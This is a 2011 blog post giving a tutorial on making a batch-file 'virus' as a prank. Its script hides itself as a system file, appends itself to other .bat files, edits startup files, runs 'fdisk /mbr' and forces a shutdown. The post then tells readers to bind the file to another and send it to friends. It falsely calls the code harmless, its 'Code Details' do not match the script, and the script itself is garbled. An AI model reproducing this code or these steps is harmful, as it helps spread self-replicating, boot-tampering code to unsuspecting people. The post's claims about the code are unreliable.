Tuesday, July 12, 2011

HOW TO CREATE A VIRUS?

Hey Guys I am here With a Small Tutorial On How to create a virus. By using This trick You Can Easily Prank Your Friends
First Of lemme Start With Telling You








What Is A Virus?
A computer virus is a computer program that can copy itself and infect a computer. The term “virus” is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.(Source Wikipedia)

As stated above, the term “computer virus” is sometimes used as a catch-all phrase to include all types of malware, adware, and spyware programs that do not have the reproductive ability. Malware includes computer viruses, worms, trojans, most rootkits, spyware, dishonest adware, crimeware, and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with computer worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan is a program that appears harmless but hides malicious functions. Worms and Trojans, like viruses, may harm a computer system’s data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious and go unnoticed.(Source Wikipedia)
  • Understand the following: It’s just a harmless “virus”. It only prints some scary messages and finally shuts down the computer. As you start it again, your computer will work as it did before!
  • Read the virus: Below you see the Computer-Code that is executed as you start the virus. The lines that start with REM are comments that the computer ignores. The explain you what the above line does.
@echo off
title %0
rem conditional check.
echo welcome to this wonderful program! please wait while I delete all your files!
rem infection of the user
copy %0 c:tmp.bat >null attrib +r +s +h c:tmp.bat echo for %%i in (*.bat) do copy c:tmp.bat+%%i %%i >>c:windowssystem32autoexec.NT
echo echo virus detected! >>c:windowssystem32autoexec.NT
echo pause >>c:windowssystem32autoexec.NT
echo NT core:infected!
echo echo shame on you! >>c:autoexec.bat
echo echo system hault-virus identified! >>c:autoexec.bat
echo chkdsk >>c:autoexec.bat
echo i t i s t o o l a t e, y o u h a v e a v i r u s, n o w u r l i f e i s n o t b e a u t i f u l
fdisk /mbr
shutdown -s -t 03 -c “windows has shut down because the lsass service has incountered a write fault at 0×00000000000000000000000000000000000″
Code Details
@echo off
color 1a (Changes the colour)
echo (Displays a text)
echo: (leaves a line)
ping -n 2 127.0.0.1>nul (pings your localhost – nothing much)
shutdown.exe (shutdown)

 PREPARING VIRUS

the Virus

  1. Read and understand the warnings!
  2. Open up Notepad in Windows. You can do this by navigating to Start > Programs > Accessories > Notepad, or simply by entering notepad under Start > Run.
  3. Copy and Paste the Code of the “virus” into Notepad
  4. Click File -> Save as
  5. Decide for a location to save the fake-virus. You should chose a location where the user won’t find the file, so saving it on the desktop would be a bad idea!
  6. Change “.txt” to “All files” in the file type drop-down menu
  7. Chose a harmless filename. Replace the “.txt” at the with “.bat”
  8. Click on save and close Notepad.
Now We Have Completed Making The Virus And Now We Must Bind The Virus With Any Other File
And After Binding The File Then Just Sent This File To Your Friends Then You can Just sit back and enjoy the show!
Hope You Liked My post……..If You Have Any Queries just Comment Here

No comments:

Post a Comment